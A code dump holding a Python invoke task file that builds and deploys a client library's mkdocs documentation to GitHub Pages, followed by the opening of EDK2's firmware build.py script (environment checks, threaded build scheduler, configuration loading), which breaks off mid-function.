API_REFERENCE_CONFIG = {
'client': ['auth'],
'session_client': [
'user',
'projects',
'project',
'use_project'
],
'project_client': [
'info',
'collections',
'collection',
'documents',
'document',
]
}
@task(name='deploy-docs')
def deploy_docs():
"""
Based on https://gist.github.com/domenic/ec8b0fc8ab45f39403dd
"""
run('rm -rf ./site/')
build_docs()
with util.cd('./site/'):
run('git init')
run('echo ".*pyc" > .gitignore')
run('git config user.name "Travis CI"')
run('git config user.email "%s"' % os.environ['EMAIL'])
run('git add .')
run('git commit -m "Deploy to GitHub Pages"')
run(
'git push --force --quiet "https://{GH_TOKEN}@{GH_REF}" '
'master:gh-pages > /dev/null 2>&1'.format(
GH_TOKEN=os.environ['GH_TOKEN'],
GH_REF=os.environ['GH_REF'],
)
)
@task(name='build-docs')
def build_docs():
generate_api_reference()
run('mkdocs build')
@task(name='serve-docs')
def serve_docs():
generate_api_reference()
target_cmd = (
'watchmedo shell-command -R -c '
'"invoke generate-api-reference" pydeform docs'
)
p = threading.Thread(target=run, args=(target_cmd,))
p.daemon = True
p.start()
run('mkdocs serve')
@task(name='generate-api-reference')
def generate_api_reference():
from docs.generator import generate_api_reference
print 'Generating API reference'
generate_api_reference()
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2017, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData="%s" % Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line != None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure != None:
EndOfProcedure.set()
if Proc == None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other != None and self.BuildObject == Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = sdict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = sdict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = sdict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = sdict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo = BuildTask._ReadyQueue.keys()[0]
Bt = BuildTask._ReadyQueue.pop(Bo)
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
# avoid tense loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency == None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory,'.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList == None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
